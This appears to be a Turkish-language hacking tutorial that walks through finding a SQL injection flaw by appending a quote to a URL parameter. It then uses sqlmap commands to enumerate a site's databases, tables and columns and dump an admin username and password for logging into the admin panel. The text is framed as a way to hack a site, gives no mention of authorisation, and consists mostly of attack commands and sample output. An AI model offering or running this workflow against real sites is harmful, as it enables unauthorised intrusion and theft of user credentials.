Sqlmap , sql ınjection açığı bulunan sayfalara girmemize yarar Python ile kodlanmıştır. Python yüklü olan sistemlerde çalışabilir. Peki nasıl kullanılır ?
Kullanımı :
Örnek Sayfa : www.siteadi.com/index.php?id=1
Mesela böyle bir sayfamız var Sql açık olduğunu nasıl anlarız ? id=1 den sonra ' işareti koyarız
www.siteadi.com/index.php?id=1'
eğer sayfada bir hata beliriyorsa Sql injection inline 1 veya herhangi bir hata o zaman sitemizde açık var peki açığımızı bulduk peki sonra ne yapıcaz ?
Sanal Makine kullanıyorsanız terminalimizi açıyoruz ve bu komutları yazıyoruz
sqlmap -u "www.siteadi.com/index.php?id=1" --dbs
bu --dbs komutu mevcut veri tabloların listesini ekrana yazdırmak için devam edelim...
evet veritabanımıza sızdık peki şimdi ne yapıcaz ?
her sitede olan information_schema diye bir tablo olur o işimize yaramaz
mesela databasemizin adı admin_123 bu tabloları nasıl çıkartırız?
sqlmap -u "www.siteadi.com/index.php?id=1"-D admin_123 --tables
-D komutu admin_123 databasemizi çekmek için ve --tables komutu tabloları çekmek için kullandık.
evet tabloları çıkarttık tablolarımızın adı
+-------------+
| user |
+-------------+
|content |
+-------------+
|shop |
+-------------+
|cart |
+-------------+
siteyi hacklemek istiyorsak yapmamız gereken şey user tablosunun içine girmek...
sqlmap -u "www.siteadi.com/index.php?id=1" -D admin_123 -T user --columns
-T komutu ise tablolaru görüntülemek için --columns ise kolonları görüntülemek için
evet karşımıza böyle tablolar geldi
+------------------+
|Id |
+------------------+
|Username |
+------------------+
|Password |
+------------------+
|Emails |
+------------------+
|Phone |
+------------------+
istersek bunların hepsini çekebiliriz ancak sadece ben siteyi hacklemek istiyorum derseniz Username ve Password işinize yarıyacaktır..
sqlmap -u "siteadi.com/index.php?id=1" -D admin_123 -T user -C Id,Username,Password --dump
şimdi burası çok önemli -C kolonları görüntülemek için burada Id'yi ilave etme amacım 1. kişi her zaman admin dir. --dump verileri çekmek için kullanılıyor...
evett verileri çektik sitenin admin panelini bulabilirseniz girebilirsiniz
+--------------------------------------------------------------------+
| Id | 1 | Username |Admin1234| Password |mksgn125 | |
+--------------------------------------------------------------------+
NOT : Eğer sizde sanal makina yoksa bu Sqlmap kullanamıyacağın anlamına gelmez Windows işletim sistemi için python indirip kullanabilirsiniz